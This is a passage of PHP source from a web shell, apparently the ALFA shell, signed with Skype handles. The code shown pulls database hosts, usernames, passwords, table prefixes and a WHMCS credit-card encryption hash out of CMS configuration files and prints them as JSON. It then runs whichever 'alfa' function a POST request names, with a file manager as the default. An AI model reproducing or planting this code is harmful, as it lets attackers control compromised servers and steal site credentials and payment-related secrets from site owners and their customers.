6462}
6463$data = array();
6464$srch_host = $config[$cms]['host'][0];
6465$srch_user = $config[$cms]['dbuser'][0];
6466$srch_name = $config[$cms]['dbname'][0];
6467$srch_pw = $config[$cms]['dbpw'][0];
6468$prefix = $config[$cms]['prefix'][0];
6469$file = $config[$cms]['file'];
6470$chost = $config[$cms]['host'][1];
6471$cuser = $config[$cms]['dbuser'][1];
6472$cname = $config[$cms]['dbname'][1];
6473$cpw = $config[$cms]['dbpw'][1];
6474$cprefix = $config[$cms]['prefix'][1];
6475if(@is_dir($path)||_alfa_is_dir($path)){
6476$file=$path.$file;
6477}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
6478$file=$path;
6479}else{
6480return false;
6481}
6482$file = __read_file($file);
6483if($cms == "drupal2"){
6484 $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
6485}elseif($cms == "vb"){
6486 $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
6487}
6488if(preg_match($srch_host, $file, $mach)){
6489$data['host'] = $mach[$chost];
6490}
6491if(preg_match($srch_user, $file, $mach)){
6492$data['user'] = $mach[$cuser];
6493}
6494if(preg_match($srch_name, $file, $mach)){
6495$data['dbname'] = $mach[$cname];
6496}
6497if(preg_match($srch_pw, $file, $mach)){
6498$data['password'] = $mach[$cpw];
6499}
6500if(isset($prefix)){
6501if(preg_match($prefix, $file, $mach)){
6502$data['prefix'] = $mach[$cprefix];
6503}
6504}
6505if($cms=='whmcs'){
6506if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
6507$data['cc_encryption_hash'] = $mach[3];
6508}
6509}
6510echo json_encode($data);
6511}
6512if(empty($_POST['a']))
6513if(isset($default_action) && function_exists('alfa' . $default_action))
6514$_POST['a'] = $default_action;
6515else
6516$_POST['a'] = 'FilesMan2';//'FilesMan';
6517if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
6518call_user_func('alfa' . $_POST['a']);
6519exit;
6520/*
6521#Persian Gulf For Ever
6522#skype : sole.sad
6523#skype : ehsan.invisible
6524*/
6525?>